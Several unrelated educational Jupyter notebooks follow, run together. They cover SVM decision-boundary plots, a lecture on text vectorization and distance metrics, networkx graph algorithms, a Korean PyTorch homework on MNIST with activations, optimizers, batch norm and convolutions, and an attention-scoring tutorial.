Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative class')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive class')
plt.legend();
plt.title('C = %f, degree=%d, c0=%f' % (C, d, c0))
```
## Gaussian RBF Kernel
```
g = 5
C = 0.001
rbf_kernel_svm_clf = Pipeline((
('scaler', StandardScaler()),
('svm_clf', SVC(kernel='rbf', gamma=g, C=C)),
))
rbf_kernel_svm_clf.fit(X, y)
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = rbf_kernel_svm_clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative class')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive class')
plt.legend();
plt.title('C = %f, degree=%d, c0=%f' % (C, d, c0))
```
# Versions and Acknowledgements
```
import sys
sys.path.append("../../src") # add our class modules to the system PYTHON_PATH
from ml_python_class.custom_funcs import version_information
version_information()
```
|
github_jupyter
|
# INFO 3350/6350
## Lecture 07: Vectorization, distance metrics, and regression
## To do
* Read HDA ch. 5 and Grimmer and Stewart for Monday (a lot of reading)
* HW3 (gender and sentiment; dictionary methods) due by Thursday night at 11:59.
* Extra credit for good, consistent answers on Ed
* Study groups are great for homeworks.
* Questions?
## Definitions
* What is a **vector**?
* An ordered collection of numbers that locate a point in space relative to a shared reference point (called the *origin*).
* We can also think of vectors as representing the quantified *features* of an object.
* Vectors are usually written as *row matrices*, or just as lists: $vec = [1.0, 0.5, 3.0, 1.2]$
* Vectors have as many *dimensions* as there are features of the object to represent.
* The number of features to represent is a choice of the experiment. There is no correct choice, though some choices are better than others for a given purpose.
* What is **vectorization**?
* The process of transforming an object into its vector representation, typically by measuring some of the object's properties.
## Why would we want to do this?
One goal of humanistic inquiry and of scientific research is to compare objects, so that we can gather them into types and compare any one object to others that we observe. Think of biological species or literary genres or historical eras. But how can we measure the difference or similarity between objects that are, after all, always necessarily individual and unique?
* Measuring the *properties* of objects lets us compare those objects to one another.
* But ... *which* properties?
* Example: We counted words by type to compare gender and sentiment in novels.
* Establishing a vector representation allows us to define a **distance metric** between objects that aren't straightforwardly spatial.
* "Distance" is a metaphor. Ditto "similarity."
* Nothing is, in itself, like or unlike anything else.
* We sometimes seek to assert that objects are similar by erasing aspects of their particularity.
* Measuring similarity and difference are (always and only) interpretive interventions.
## A spatial example
Consider this map of central campus:

**How far apart are Gates Hall (purple star) and the clock tower (orange star)?**
What do we need to know or define in order to answer this question?
* Where is each building in physical space.
* Latitude/longitude; meters north/south and east/west of the book store; etc.
* How do we want to measure the distance between them (walking, driving, flying, tunneling, ...). Minutes or miles?
Normal, boring answer: about 0.4 miles on foot via Campus Rd and Ho Plaza, or a bit less if you cut some corners, or less than 0.3 miles if you can fly.
| Clock tower | Gates Hall |
| --- | --- |
|  |  |
More interesting version: How far apart are these buildings conceptually? Architecturally? Historically?
* What are the features and metrics you would use to answer this question?
* This is a lot more like the problem of comparing texts.
## A textual example
```
text = '''\
My cat likes water.
The dog eats food.
The dog and the cat play together.
A dog and a cat meet another dog and cat.
The end.'''
# Print with sentence numbers
for line in enumerate(text.split('\n')):
print(line)
```
Let us stipulate that we want to compare these five sentences according to their "*dogness*" and "*catness*." We care about those two aspects alone, nothing else.
Let's develop some intuitions here:
* Sentences 0 and 1 are as far apart as can be: 0 is about cats, 1 is about dogs.
* Sentence 2 lies between 0 and 1. It contains a mix of dogness and catness.
* Sentence 3 is kind of like sentence 2, but it has twice as much of both dogness and catness.
* How different are sentences 2 and 3? (There's no objectively correct answer.)
* Sentence 4 is a zero point. It has no dogness or catness.
### Count relevant words
||**cat**|**dog**|
|---|---|---|
|**sent**| | |
|0|1|0|
|1|0|1|
|2|1|1|
|3|2|2|
|4|0|0|
The **vector representation** of sentence 0 is `[1, 0]`. The vector representation of sentence 3 is `[2, 2]`. And so on ...
### Visualize (scatter plot)
Sketch this by hand ...
### Distance measures
How far apart are sentences 0 and 1 (and all the rest)?
#### Manhattan distance
* Also called "city block" distance.
* Not much used, but easy to understand and to compute (which matters for very large data sets).
* Sum of the absolute difference in each dimension.
For **sentences 0 and 1**, the Manhattan distance = |1| + |-1| = 2.
#### Euclidean distance
* Straight-line or "as the crow flies" distance.
* Widely used in data science, but not always the best choice for textual data.
Recall the Pythagorean theorem for the hypotenuse of a triangle: $a^2 = b^2 + c^2$ or $a = \sqrt{b^2 +c^2}$.
For **sentences 0 and 1**, the Euclidean distance = $\sqrt{1^2 + 1^2} = \sqrt{2} = 1.414$.
OK, but what about the Euclidean distance between **sentence 0 and sentence 3**? Well, that distance = $\sqrt{1^2 + 2^2} = \sqrt{5} = 2.24$.
And between **sentences 2 and 3** (both balanced 50:50 between dogs and cats)? That's 1.4 again, the same as the distance between sentences 0 and 1 (which, recall, are totally divergent in dog/cat content).
An obvious improvement in this case would be to **normalize word counts by document length**.
#### Cosine distance
Maybe instead of distance, we could measure the difference in **direction** from the origin between points.
* **Sentences 0 and 1** are 90 degrees apart.
* **Sentences 2 and 3** are 0 degrees apart.
* **Sentences 0 and 1** are each 45 degrees away from **sentences 2 and 3**.
Now, recall the values of the **cosine** of an angle between 0 and 90 degrees. (Sketch by hand)
So, the cosines of the angles between sentences are:
sentences|angle|cosine
---|---|---
0 and 1|90|0
2 and 3|0|1
0 and 2|45|0.707
0 and 3|45|0.707
1 and 2|45|0.707
We could then transform these cosine **similarities** into **distances** by subtracting them from 1, so that the most *dissimilar* sentences (like 0 and 1) have the greatest distance between them.
The big advantage here is that we don't need to worry about getting length normalization right. Cosine distance is often a good choice for text similarity tasks.
#### Higher dimensions
All of these metrics can be calculated in arbitrarily many dimensions. Which is good, because textual data is often very high-dimensional. Imagine counting the occurrences of each word type in a large corpus of novels or historical documents. Can easily be tens of thousands of dimensions.
## In the real world
* There's nothing wrong with any of these vectorizations and distance metrics, exactly, but they're not state of the art.
* If you've done some recent NLP work, you'll know that, at the very least, you'd want to use static word embeddings in place of raw tokens.
* This allows you to capture the similarity of meaning between, e.g., "cat" and "kitten."
* If you were especially ambitious, you'd be looking at something like BERT or ELMo or GPT-2/3, etc.
* These transformer-based methods allow for *contextual* embeddings, that is, they represent a word token differently depending on the context in which it appears, so that the representation of "bank" in "my money is in the bank" is different from the the representation of "bank" in "we walked along the bank of the river."
* We'll touch on contextual embeddings near the end of the semester.
* And then you might want features that correspond to aspects of a text other than the specific words it contains.
* When was it written?
* By *whom* was it written?
* How long is it?
* In what style is it written?
* Who read it?
* How much did it cost?
* How many people read or reviewed it?
* What else did its readers also read?
* And so on ...
Here, though, we're trying to grasp the *idea* behind document similarity, on which all of these methods depend: transform text into a numeric representation of its features (often, a representation of its content or meaning), then quantify the difference or similarity between those numeric representations.
## In the problem set world
We'll dig into how, as a practical matter, we can vectorize texts and calclulate distance metrics in this week's problem set.
We'll use `scikit-learn` to implement vectorization and distance metrics. The `scikit-learn` API almost always involves *three* steps:
1. Instantiate a learning object (such as a vectorizer, regressor, classifier, etc.). This is the object that will hold the parameters of your fitted model.
1. Call the instantiated learning object's `.fit()` method, passing in your data. This allows the model to learn the optimal parameters from your data.
1. Call the fitted model's `.transform()` or `.predict()` method, passing in either the same data from the `fit` step or new data. This step uses the fitted model to generate outputs given the input data you supply.
For example:
```
from sklearn.feature_extraction.text import CountVectorizer
# get example text as one doc per line
docs = [sent for sent in text.split('\n')]
# instantiate vectorizer object
# note setup options
vectorizer = CountVectorizer(
vocabulary=['cat', 'dog']
)
# fit to data
vectorizer.fit(docs)
# transform docs to features
features = vectorizer.transform(docs)
# print output feature matrix
print(vectorizer.get_feature_names_out())
print(features.toarray())
# calculate distances
from sklearn.metrics.pairwise import euclidean_distances, cosine_distances, cosine_similarity
import numpy as np
print("Euclidean distances")
print(np.round(euclidean_distances(features),2))
print("\nCosine distances")
print(np.round(cosine_distances(features),2))
print("\nCosine **similarities**")
print(np.round(cosine_similarity(features),2))
# FYI, a heatmap vis
import seaborn as sns
print("Euclidean distances")
sns.heatmap(
euclidean_distances(features),
annot=True,
square=True
);
```
## Regression
We are often interested in the relationships between measured properties of texts, or between a textual property and some other variable (year of publication, number of sales, and so on).
Maybe the most basic way to measure the relationship between two variables is to use **linear regression**. The idea is to calculate a straight line through your data such that the average distance between the observed data points and the line is as small as possible.
(Sketch what this looks like)
You can then calculate the **coefficient of determination**, written $r^2$ ("r squared"), which measures the fraction of the variation in the dependent (y) variable that is predictable from the independent (x) variable.
$r^2$ = 1 - (sum of squared residuals)/(sum of squared values)
An $r^2$ value of 1 indicates perfect correlation between the variables; zero means no correlation.
* There's a *lot* more to this. We'll spend some time on it later in the semester.
* For now, focus on the fact that regression is a way to calculate a line of best fit through a data set.
* Notice that we could also try to find something like a "line of *worst* fit," which we could think of as the dividing line between two regions of feature space. This would be something like the line on which we are least likely to encounter any actual data points.
* Think about what use-value such a dividing line might have ...
|
github_jupyter
|
## Algorithm - II
### Clustering, Link Analysis, Node Classification, Link Prediction
```
import matplotlib.pyplot as plt
import networkx as nx
import seaborn as sns
sns.set()
%matplotlib inline
import warnings
import matplotlib.cbook
warnings.filterwarnings("ignore",category=matplotlib.cbook.mplDeprecation)
G = nx.karate_club_graph()
nx.draw(G, node_size = 500, node_color = "lightblue", with_labels = True)
```
### Clustering
Algorithms to characterize the number of triangles in a graph.
- ```triangles(G[, nodes])``` Compute the number of triangles.
- ```transitivity(G)``` Compute graph transitivity, the fraction of all possible triangles present in G.
- ```clustering(G[, nodes, weight])``` Compute the clustering coefficient for nodes.
- ```average_clustering(G[, nodes, weight, …])``` Compute the average clustering coefficient for the graph G.
- ```square_clustering(G[, nodes])``` Compute the squares clustering coefficient for nodes.
- ```generalized_degree(G[, nodes])``` Compute the generalized degree for nodes.
```
nx.triangles(G)
nx.transitivity(G)
nx.clustering(G)
```
--------------
### Link Analysis
#### PageRank
PageRank analysis of graph structure.
- ```pagerank(G[, alpha, personalization, …])``` Returns the PageRank of the nodes in the graph.
- ```pagerank_numpy(G[, alpha, personalization, …])``` Returns the PageRank of the nodes in the graph.
- ```pagerank_scipy(G[, alpha, personalization, …])``` Returns the PageRank of the nodes in the graph.
- ```google_matrix(G[, alpha, personalization, …])``` Returns the Google matrix of the graph.
```
nx.pagerank(G)
nx.google_matrix(G)
```
------------
#### Hits
Hubs and authorities analysis of graph structure.
- ```hits(G[, max_iter, tol, nstart, normalized])``` Returns HITS hubs and authorities values for nodes.
- ```hits_numpy(G[, normalized])``` Returns HITS hubs and authorities values for nodes.
- ```hits_scipy(G[, max_iter, tol, normalized])``` Returns HITS hubs and authorities values for nodes.
- ```hub_matrix(G[, nodelist])``` Returns the HITS hub matrix.
- ```authority_matrix(G[, nodelist])``` Returns the HITS authority matrix.
```
nx.hits(G)
nx.hub_matrix(G)
nx.authority_matrix(G)
```
----------------
### Node Classification
This module provides the functions for node classification problem.
The functions in this module are not imported into the top level networkx namespace. You can access these functions by importing the ```networkx.algorithms.node_classification``` modules, then accessing the functions as attributes of node_classification. For example:
```
import networkx as nx
from networkx.algorithms import node_classification
G = nx.balanced_tree(3,3)
nx.draw(G, node_size = 500, node_color = "lightgreen", with_labels = True)
G.node[1]['label'] = 'A'
G.node[2]['label'] = 'B'
G.node[3]['label'] = 'C'
L = node_classification.harmonic_function(G)
print(L)
LL = {}
for n,l in zip(G.nodes(),L):
LL.update({n:l})
nx.draw(G, node_size = 500, labels = LL, node_color = "lightgreen", with_labels = True)
```
--------------
### Link Prediction
Link prediction algorithms.
- ```resource_allocation_index(G[, ebunch])``` Compute the resource allocation index of all node pairs in ebunch.
- ```jaccard_coefficient(G[, ebunch])``` Compute the Jaccard coefficient of all node pairs in ebunch.
- ```adamic_adar_index(G[, ebunch])``` Compute the Adamic-Adar index of all node pairs in ebunch.
- ```preferential_attachment(G[, ebunch])``` Compute the preferential attachment score of all node pairs in ebunch.
- ```cn_soundarajan_hopcroft(G[, ebunch, community])``` Count the number of common neighbors of all node pairs in ebunch
- ```ra_index_soundarajan_hopcroft(G[, ebunch, …])``` Compute the resource allocation index of all node pairs in ebunch using community information.
- ```within_inter_cluster(G[, ebunch, delta, …])``` Compute the ratio of within- and inter-cluster common neighb
```
G = nx.karate_club_graph()
nx.draw(G, node_size = 500, node_color = "lightblue", with_labels = True)
preds = nx.resource_allocation_index(G, [(0,10),(9, 18), (11, 12),(30,27),(16,26)])
for u, v, p in preds:
print('(%d, %d) -> %.8f' % (u, v, p))
```
|
github_jupyter
|
# **[HW2] Training Neural Network**
1. Prerequisite
2. Activation
3. Optimizer
4. Regularization
5. FC vs Conv
6. Do it by yourself
이번 실습에서는 지난 시간에 배웠던 MLP-layer의 component들을 하나씩 바꿔가며 activation, optimizer, regularization, convolution layer등의 중요성을 하나씩 익혀가는 시간을 갖도록 하겠습니다.
# 1. Prerequisite
본격적인 실습을 진행하기 이전, 지난 [HW1.2 Logistic Regression vs MLP]에서 진행했던것과 동일하게 \\
Mnist dataset에 대해서 DataLoader와 Trainer class를 생성해두겠습니다.
## Import packages
런타임의 유형을 변경해줍니다.
상단 메뉴에서 [런타임]->[런타임유형변경]->[하드웨어가속기]->[GPU]
변경 이후 아래의 cell을 실행 시켰을 때, torch.cuda.is_avialable()이 True가 나와야 합니다.
```
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torch.optim as optim
from torch.utils import data
print(torch.__version__)
print(torch.cuda.is_available())
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
np.set_printoptions(precision=3)
np.set_printoptions(suppress=True)
```
## Load Dataset
```
mnist = fetch_openml('mnist_784', cache=False)
X = mnist.data.astype('float32').values
y = mnist.target.astype('int64').values
X /= 255.0
print(X.shape)
print(y.shape)
```
## Split Dataset
학습과 평가를 위한 dataset으로 나눕니다.
```
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
print(X_train.shape)
print(y_train.shape)
print(X_test.shape)
print(y_test.shape)
```
## Pytorch Dataset
```
class CustomDataset(torch.utils.data.Dataset):
def __init__(self, X, y):
super(CustomDataset, self).__init__()
self.X = X
self.y = y
def __getitem__(self, index):
x = self.X[index]
y = self.y[index]
x = torch.from_numpy(x).float()
y = torch.from_numpy(np.array(y)).long()
return x, y
def __len__(self):
return len(self.X)
train_dataset = CustomDataset(X_train, y_train)
test_dataset = CustomDataset(X_test, y_test)
print(len(train_dataset))
print(train_dataset.X.shape)
print(len(test_dataset))
print(test_dataset.X.shape)
```
## DataLoader
```
batch_size = 64
# shuffle the train data
train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
# do not shuffle the val & test data
test_dataloader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False)
# dataset size // batch_size
print(len(train_dataloader))
print(len(test_dataloader))
```
## Trainer
```
class Trainer():
def __init__(self, trainloader, testloader, model, optimizer, criterion, device):
"""
trainloader: train data's loader
testloader: test data's loader
model: model to train
optimizer: optimizer to update your model
criterion: loss function
"""
self.trainloader = trainloader
self.testloader = testloader
self.model = model
self.optimizer = optimizer
self.criterion = criterion
self.device = device
def train(self, epoch = 1):
self.model.train()
for e in range(epoch):
running_loss = 0.0
for i, data in enumerate(self.trainloader, 0):
inputs, labels = data
# model에 input으로 tensor를 gpu-device로 보낸다
inputs = inputs.to(self.device)
labels = labels.to(self.device)
# zero the parameter gradients
self.optimizer.zero_grad()
# forward + backward + optimize
outputs = self.model(inputs)
loss = self.criterion(outputs, labels)
loss.backward()
self.optimizer.step()
running_loss += loss.item()
print('epoch: %d loss: %.3f' % (e + 1, running_loss / len(self.trainloader)))
running_loss = 0.0
def test(self):
self.model.eval()
correct = 0
for inputs, labels in self.testloader:
inputs = inputs.to(self.device)
labels = labels.to(self.device)
output = self.model(inputs)
pred = output.max(1, keepdim=True)[1] # get the index of the max
correct += pred.eq(labels.view_as(pred)).sum().item()
test_acc = correct / len(self.testloader.dataset)
print('test_acc: %.3f' %(test_acc))
```
# 2. Activation Function
이번 section에서는 가장 대표적으로 사용되는 sigmoid function과 relu function을 사용해보고 비교해보도록 하겠습니다.

- input: 784
- hidden: 32 or (32, 32)
- output: 10
- **activation: sigmoid or relu**
- optimizer: sgd
- loss: cross-entropy
## 2-layer Network + Sigmoid
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=32,
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.sigmoid(x)
x = self.fc2(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 2-layer Network + ReLU
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=32,
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
#### Q1. Activation Function에 따라 성능의 차이가 있나요? 있다면, 왜 차이가 발생했을까요?
## 3-layer Network + Sigmoid
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.sigmoid(x)
x = self.fc2(x)
x = F.sigmoid(x)
x = self.fc3(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 3-layer Network + ReLU
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.fc3(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
#### Q2. Activation function 별로 Layer 수를 늘리는 것이 성능이 어떻게 변하나요? 양상이 다르게 나타난다면 왜 그럴까요?
#### Q3. Activation function이 존재하지 않는다면 어떤 일이 일어날까요?
# 3. Optimization
이번 section에서는 sgd, momentum, Adam등의 optimizer를 사용해보고 성능을 비교해보도록 하겠습니다.

- input: 784
- hidden: (32, 32)
- output: 10
- activation: relu
- **optimizer: sgd or momentum or adam**
- loss: cross-entropy
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.fc3(x)
return x
```
## 3-layer Network + ReLU + SGD
```
model = MLP()
optimizer = optim.SGD(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 3-layer Network + ReLU + Momentum
```
model = MLP()
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.99)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 3-layer Network + ReLU + Adam
```
model = MLP()
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
#### Q4. Optimizer 별로 수렴 속도가 어떻게 다른가요?
##### Q4.1 수렴 속도가 다르다면 sgd와 momentum의 차이는 왜 발생할까요?
##### Q4.2 수렴 속도가 다르다면 momentum과 Adam의 차이는 왜 발생할까요?
## 4. Regularization
이번 section에서는 image data에서 주로 사용되는 batch-normalization을 어떻게 사용하는지를 확인해보겠습니다.

- input: 784
- hidden: 32 or (32, 32)
- output: 10
- activation: relu
- optimizer: adam
- **regularizer: batch_norm**
- loss: cross-entropy
## 3-layer Network + ReLU + Adam + batch_norm
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.bn1 = nn.BatchNorm1d(hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.bn2 = nn.BatchNorm1d(hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.fc2(x)
x = self.bn2(x)
x = F.relu(x)
x = self.fc3(x)
return x
model = MLP()
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
def count_parameters(model):
print(sum(p.numel() for p in model.parameters() if p.requires_grad))
return sum(p.numel() for p in model.parameters() if p.requires_grad)
count_parameters(model)
```
#### Q5. Batch-normalization을 사용하기 전 후로 성능이 어떻게 변화했나요? 왜 이러한 변화가 일어났을까요?
# 5. Fully-Connected Layer vs Convolution Layer
지금까지 model의 다양한 node를 바꿔가며 mnist의 성능 변화를 확인해보는 실습을 진행해 보았습니다. \\
비록, fully-connected network가 mnist 데이터에서 높은 성능을 내는데는 문제가 없었지만, 모든 layer를 fully-connected layer로 만드는 것은 엄청난 파라미터와 연산량을 필요로 하기 때문에 더욱 큰 고화질의 이미지 데이터를 처리하는데는 적합하지 않습니다. \\
따라서, 이번 section에서는 이미지 데이터 처리에 주로 사용되는 convolution layer를 사용해보고 파라미터 수와 성능이 어떻게 변화하는지 확인해보도록 하겠습니다.
## Convolution Operation

### Q6. Input이 (H, W, C) 일 때, stride S의 2개의 (F * F) convolutional filter를 적용하면 output이 어떻게 되나요?
```
class Conv(nn.Module):
def __init__(self,
input_dim=784,
output_dim=10):
super(Conv, self).__init__()
self.conv1 = nn.Conv2d(in_channels=1,
out_channels=8,
kernel_size=7,
stride=2)
self.conv2 = nn.Conv2d(in_channels=8,
out_channels=8,
kernel_size=7,
stride=2)
self.fc = nn.Linear(3*3*8, output_dim)
def forward(self, x):
# should reshape data into image
x = x.reshape(-1, 1, 28, 28)
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = x.reshape(-1, 3*3*8)
x = self.fc(x)
return x
model = Conv()
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
count_parameters(model)
```
##### Q7. covolution operation은 image데이터를 다루는데 있어서 fully-connected layer에 비해 어떤 점에서 효과적일까요?
## 6. Do It By Yourself
위에서 했던 실습들과 수업에 배웠던 다양한 network component들을 참조해서 20,000개 이하의 파라미터로 98%의 accuracy를 달성해보세요!
```
class CustomModel(nn.Module):
def __init__(self,
input_dim=784,
output_dim=10):
super(CustomModel, self).__init__()
# [64, 1, 28, 28] => [64, 3, 22, 22]
self.conv1 = nn.Conv2d(in_channels=1,
out_channels=3,
kernel_size=7,
stride=1)
self.bn1 = nn.BatchNorm2d(3)
# [64, 3, 22, 22] => [64, 8, 16, 16]
self.conv2 = nn.Conv2d(in_channels=3,
out_channels=7,
kernel_size=7,
stride=1)
self.bn2 = nn.BatchNorm2d(7)
self.fc = nn.Linear(16*16*7, output_dim)
def forward(self, x):
# should reshape data into image
x = x.reshape(-1, 1, 28, 28)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.conv2(x)
x = self.bn2(x)
x = F.relu(x)
x = x.reshape(-1, 16*16*7)
x = self.fc(x)
return x
model = CustomModel()
count_parameters(model)
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
|
github_jupyter
|
# Attention Basics
In this notebook, we look at how attention is implemented. We will focus on implementing attention in isolation from a larger model. That's because when implementing attention in a real-world model, a lot of the focus goes into piping the data and juggling the various vectors rather than the concepts of attention themselves.
We will implement attention scoring as well as calculating an attention context vector.
## Attention Scoring
### Inputs to the scoring function
Let's start by looking at the inputs we'll give to the scoring function. We will assume we're in the first step in the decoding phase. The first input to the scoring function is the hidden state of decoder (assuming a toy RNN with three hidden nodes -- not usable in real life, but easier to illustrate):
```
dec_hidden_state = [5,1,20]
```
Let's visualize this vector:
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Let's visualize our decoder hidden state
plt.figure(figsize=(1.5, 4.5))
sns.heatmap(np.transpose(np.matrix(dec_hidden_state)), annot=True, cmap=sns.light_palette("purple", as_cmap=True), linewidths=1)
```
Our first scoring function will score a single annotation (encoder hidden state), which looks like this:
```
annotation = [3,12,45] #e.g. Encoder hidden state
# Let's visualize the single annotation
plt.figure(figsize=(1.5, 4.5))
sns.heatmap(np.transpose(np.matrix(annotation)), annot=True, cmap=sns.light_palette("orange", as_cmap=True), linewidths=1)
```
### IMPLEMENT: Scoring a Single Annotation
Let's calculate the dot product of a single annotation. NumPy's [dot()](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) is a good candidate for this operation
```
def single_dot_attention_score(dec_hidden_state, enc_hidden_state):
# TODO: return the dot product of the two vectors
return
single_dot_attention_score(dec_hidden_state, annotation)
```
### Annotations Matrix
Let's now look at scoring all the annotations at once. To do that, here's our annotation matrix:
```
annotations = np.transpose([[3,12,45], [59,2,5], [1,43,5], [4,3,45.3]])
```
And it can be visualized like this (each column is a hidden state of an encoder time step):
```
# Let's visualize our annotation (each column is an annotation)
ax = sns.heatmap(annotations, annot=True, cmap=sns.light_palette("orange", as_cmap=True), linewidths=1)
```
### IMPLEMENT: Scoring All Annotations at Once
Let's calculate the scores of all the annotations in one step using matrix multiplication. Let's continue to use the dot scoring method
<img src="images/scoring_functions.png" />
To do that, we'll have to transpose `dec_hidden_state` and [matrix multiply](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html) it with `annotations`.
```
def dot_attention_score(dec_hidden_state, annotations):
# TODO: return the product of dec_hidden_state transpose and annotations
return
attention_weights_raw = dot_attention_score(dec_hidden_state, annotations)
attention_weights_raw
```
Looking at these scores, can you guess which of the four vectors will get the most attention from the decoder at this time step?
## Softmax
Now that we have our scores, let's apply softmax:
<img src="images/softmax.png" />
```
def softmax(x):
x = np.array(x, dtype=np.float128)
e_x = np.exp(x)
return e_x / e_x.sum(axis=0)
attention_weights = softmax(attention_weights_raw)
attention_weights
```
Even when knowing which annotation will get the most focus, it's interesting to see how drastic softmax makes the end score become. The first and last annotation had the respective scores of 927 and 929. But after softmax, the attention they'll get is 0.12 and 0.88 respectively.
# Applying the scores back on the annotations
Now that we have our scores, let's multiply each annotation by its score to proceed closer to the attention context vector. This is the multiplication part of this formula (we'll tackle the summation part in the latter cells)
